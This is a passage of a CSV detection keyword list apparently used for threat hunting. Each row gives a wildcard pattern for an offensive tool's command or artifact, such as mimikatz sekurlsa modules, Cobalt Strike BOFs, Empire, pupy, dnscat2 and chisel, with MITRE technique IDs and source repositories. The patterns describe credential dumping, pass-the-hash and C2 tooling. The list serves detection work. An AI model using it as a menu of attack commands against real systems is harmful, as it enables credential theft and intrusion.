TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::msv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::process*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::pth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::tickets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::tspkg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::wdigest*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*SELECT * FROM EvilSignature*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*SELECT * FROM EvilSignature*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*SELECT displayName FROM AntiVirusProduct*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*self_delete.x64.o*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" +"*Self_Deletion_BOF*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" +"*-selfdelete.exe -d:selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*SeManageVolumeExploit.*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" +"*SeManageVolumeExploit-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" +"*Semperis/GoldenGMSA*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*Send the payload with the grooms*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*send_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" +"*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*Send-CalendarNTLMLeak *","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"*sendmail -osendmail chmod +x sendmail*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*sense2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sensepost/goDoH*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*sensepost/reGeorg*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" +"*sensepost/ruler*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*sensepost/wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*sensitive_files_win.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Sensitivelocalfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*senzee1984/micr0_shell*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*seriously_nothing_shady_here*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*serve_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Server enforces NLA; switching to 'fake server' mode*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*server*-relay.screenconnect.com*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*server.py generate --address * --port * --output * --source*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*server/modules/csharp/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*server@egress-asses.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*server=*port=53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*-server=http://127.0.0.1:4002*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*server-7566091c4e4a2a24.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*server-console.exe +*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*server-console.py --mifi-ip *","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*--server-port * --server-ip * --proxy-ip * --proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*serverscan.linux.elf*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 